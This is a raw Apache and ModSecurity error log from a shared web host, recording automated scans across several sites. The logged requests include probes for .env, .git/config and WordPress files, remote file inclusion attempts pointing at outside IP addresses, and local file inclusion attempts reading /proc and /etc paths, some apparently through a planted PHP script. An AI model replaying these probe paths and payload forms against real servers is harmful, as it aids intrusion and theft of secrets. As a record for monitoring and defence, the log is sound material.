[Mon May 11 18:37:32.726890 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:32.885551 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/wp-config-sample.php
[Mon May 11 18:37:32.885653 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:33.046127 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:33.204541 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:33.363050 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:33.521993 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:33.679963 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/wp.php
[Mon May 11 18:37:33.680051 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:33.838123 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:34.020547 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/xmlrpc.php
[Mon May 11 18:37:34.020637 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:37:34.179828 2026] [:error] [pid 1411201:tid 1411260] [client 4.193.137.131:3495] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 18:38:31.609614 2026] [:error] [pid 1411055:tid 1411081] [client 46.151.178.13:47134] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 18:39:00.094269 2026] [security2:error] [pid 1424905:tid 1424925] [client 150.109.12.46:47454] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-json/"] [unique_id "agIGJIW8yzYoWG_eyCXEFQAAAVE"]
[Mon May 11 18:39:00.729629 2026] [proxy_http:error] [pid 1416109:tid 1416153] (20014)Internal error (specific information not available): [client 208.84.102.100:20822] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 18:39:00.730176 2026] [proxy_http:error] [pid 1411201:tid 1411253] (20014)Internal error (specific information not available): [client 208.84.102.100:20870] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 18:39:00.729935 2026] [proxy:error] [pid 1416109:tid 1416153] [client 208.84.102.100:20822] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/api/.env
[Mon May 11 18:39:00.730210 2026] [proxy:error] [pid 1411201:tid 1411253] [client 208.84.102.100:20870] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/app/.env
[Mon May 11 18:39:23.385198 2026] [security2:error] [pid 1411099:tid 1411113] [client 43.134.36.238:42458] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/book.php"] [unique_id "agIGOw-Qm4vhlWBPlMjoYgAAAA0"]
[Mon May 11 18:39:35.033465 2026] [security2:error] [pid 1416109:tid 1416147] [client 35.153.86.200:23765] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://188.166.198.57 found within ARGS:url: http://188.166.198.57/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGR1V4kyjgo4bQBUiD3gAAANE"]
[Mon May 11 18:39:35.034327 2026] [security2:error] [pid 1416109:tid 1416147] [client 35.153.86.200:23765] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGR1V4kyjgo4bQBUiD3gAAANE"]
[Mon May 11 18:39:35.034657 2026] [security2:error] [pid 1416109:tid 1416147] [client 35.153.86.200:23765] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGR1V4kyjgo4bQBUiD3gAAANE"]
[Mon May 11 18:40:03.563019 2026] [security2:error] [pid 1411201:tid 1411268] [client 52.207.47.227:2286] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://159.89.211.184 found within ARGS:url: http://159.89.211.184/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGY_y_GXSWIKeli0siRwAAAJc"]
[Mon May 11 18:40:03.564371 2026] [security2:error] [pid 1411201:tid 1411268] [client 52.207.47.227:2286] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGY_y_GXSWIKeli0siRwAAAJc"]
[Mon May 11 18:40:03.565389 2026] [security2:error] [pid 1411201:tid 1411268] [client 52.207.47.227:2286] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGY_y_GXSWIKeli0siRwAAAJc"]
[Mon May 11 18:40:12.345026 2026] [security2:error] [pid 1424905:tid 1424925] [client 129.226.152.67:34754] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIGbIW8yzYoWG_eyCXEYQAAAVE"]
[Mon May 11 18:41:01.948021 2026] [security2:error] [pid 1411055:tid 1411060] [client 43.134.188.114:50390] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/author/nico/"] [unique_id "agIGnUWKUxpmnkK7zHyusAAAAQM"]
[Mon May 11 18:42:28.599245 2026] [security2:error] [pid 1412074:tid 1412094] [client 43.140.247.223:59814] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "domaine-de-janasse.com"] [uri "/"] [unique_id "agIG9DJnyuKVXoStDhblrwAAAFI"]
[Mon May 11 18:42:30.335776 2026] [security2:error] [pid 1411201:tid 1411256] [client 216.73.216.110:43917] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/net/udp found within ARGS:filesrc: /proc/net/udplite"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIG9vy_GXSWIKeli0sjAAAAAIo"]
[Mon May 11 18:42:30.336689 2026] [security2:error] [pid 1411201:tid 1411256] [client 216.73.216.110:43917] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIG9vy_GXSWIKeli0sjAAAAAIo"]
[Mon May 11 18:42:30.431376 2026] [security2:error] [pid 1411201:tid 1411256] [client 216.73.216.110:43917] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIG9vy_GXSWIKeli0sjAAAAAIo"]
PHP Warning:  filesize(): stat failed for /proc/74/task/74/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/74/task/74/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/74/task/74/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/74/task/74/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/74/task/74/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/74/task/74/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:43:01.321733 2026] [ssl:error] [pid 1416109:tid 1416134] (EAI 2)Name or service not known: [client 109.131.150.252:53451] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:43:01.321996 2026] [ssl:error] [pid 1416109:tid 1416134] AH01941: stapling_renew_response: responder error
[Mon May 11 18:43:16.959738 2026] [security2:error] [pid 1412074:tid 1412082] [client 216.73.216.110:34898] ModSecurity: Warning. Matched phrase "etc/security/time.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/time.conf found within ARGS:filesrc: /etc/security/time.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIHJDJnyuKVXoStDhbl6AAAAEY"]
[Mon May 11 18:43:16.960526 2026] [security2:error] [pid 1412074:tid 1412082] [client 216.73.216.110:34898] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIHJDJnyuKVXoStDhbl6AAAAEY"]
[Mon May 11 18:43:17.060230 2026] [security2:error] [pid 1412074:tid 1412082] [client 216.73.216.110:34898] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIHJDJnyuKVXoStDhbl6AAAAEY"]
[Mon May 11 18:43:38.110601 2026] [ssl:error] [pid 1412074:tid 1412094] (EAI 2)Name or service not known: [client 17.246.15.91:48914] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 18:43:38.110856 2026] [ssl:error] [pid 1412074:tid 1412094] AH01941: stapling_renew_response: responder error
[Mon May 11 18:44:03.544713 2026] [security2:error] [pid 1424905:tid 1424914] [client 34.32.118.179:39486] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agIHU4W8yzYoWG_eyCXFUgAAAUY"]
[Mon May 11 18:44:03.544958 2026] [security2:error] [pid 1424905:tid 1424914] [client 34.32.118.179:39486] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.git/config"] [unique_id "agIHU4W8yzYoWG_eyCXFUgAAAUY"]
[Mon May 11 18:44:04.683292 2026] [security2:error] [pid 1424905:tid 1424914] [client 34.32.118.179:39486] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agIHU4W8yzYoWG_eyCXFUgAAAUY"]
[Mon May 11 18:44:25.770429 2026] [core:error] [pid 1416109:tid 1416147] [client 195.178.110.242:4506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:25.770626 2026] [core:error] [pid 1416109:tid 1416147] [client 195.178.110.242:4506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:25.870766 2026] [core:error] [pid 1411099:tid 1411109] [client 195.178.110.242:4528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.dev.rentparadise.fr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings
[Mon May 11 18:44:25.870803 2026] [core:error] [pid 1411099:tid 1411109] [client 195.178.110.242:4528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.dev.rentparadise.fr/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings
[Mon May 11 18:44:27.969783 2026] [core:error] [pid 1411201:tid 1411246] [client 13.75.199.23:3785] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:27.969997 2026] [core:error] [pid 1411201:tid 1411246] [client 13.75.199.23:3785] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:28.776917 2026] [core:error] [pid 1416109:tid 1416145] [client 13.75.199.23:3792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:28.776960 2026] [core:error] [pid 1416109:tid 1416145] [client 13.75.199.23:3792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:29.607476 2026] [core:error] [pid 1411099:tid 1411119] [client 13.75.199.23:3924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:29.607513 2026] [core:error] [pid 1411099:tid 1411119] [client 13.75.199.23:3924] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:30.441953 2026] [core:error] [pid 1424905:tid 1424923] [client 13.75.199.23:3999] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:30.444098 2026] [core:error] [pid 1424905:tid 1424923] [client 13.75.199.23:3999] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:31.869646 2026] [core:error] [pid 1412074:tid 1412077] [client 13.75.199.23:3282] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:31.869682 2026] [core:error] [pid 1412074:tid 1412077] [client 13.75.199.23:3282] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:32.655472 2026] [core:error] [pid 1424905:tid 1424916] [client 13.75.199.23:3835] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:32.655507 2026] [core:error] [pid 1424905:tid 1424916] [client 13.75.199.23:3835] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:33.454206 2026] [core:error] [pid 1411099:tid 1411123] [client 13.75.199.23:14135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:33.454576 2026] [core:error] [pid 1411099:tid 1411123] [client 13.75.199.23:14135] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:34.272973 2026] [core:error] [pid 1411055:tid 1411064] [client 13.75.199.23:14130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:34.273007 2026] [core:error] [pid 1411055:tid 1411064] [client 13.75.199.23:14130] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:35.049452 2026] [core:error] [pid 1424905:tid 1424927] [client 13.75.199.23:14129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:35.049488 2026] [core:error] [pid 1424905:tid 1424927] [client 13.75.199.23:14129] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:35.812051 2026] [core:error] [pid 1411201:tid 1411248] [client 13.75.199.23:14123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:35.812197 2026] [core:error] [pid 1411201:tid 1411248] [client 13.75.199.23:14123] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:36.190742 2026] [ssl:error] [pid 1416109:tid 1416135] [client 66.132.172.100:25082] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname mail.rentparadise.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 18:44:36.611111 2026] [core:error] [pid 1411055:tid 1411066] [client 13.75.199.23:3324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:36.611146 2026] [core:error] [pid 1411055:tid 1411066] [client 13.75.199.23:3324] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:37.415289 2026] [core:error] [pid 1411201:tid 1411253] [client 13.75.199.23:14131] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:37.415649 2026] [core:error] [pid 1411201:tid 1411253] [client 13.75.199.23:14131] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:38.225136 2026] [core:error] [pid 1412074:tid 1412092] [client 13.75.199.23:3779] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:38.225182 2026] [core:error] [pid 1412074:tid 1412092] [client 13.75.199.23:3779] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:38.984140 2026] [core:error] [pid 1424905:tid 1424925] [client 13.75.199.23:3326] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:38.984192 2026] [core:error] [pid 1424905:tid 1424925] [client 13.75.199.23:3326] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:39.743765 2026] [core:error] [pid 1412074:tid 1412088] [client 13.75.199.23:14108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:39.743984 2026] [core:error] [pid 1412074:tid 1412088] [client 13.75.199.23:14108] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
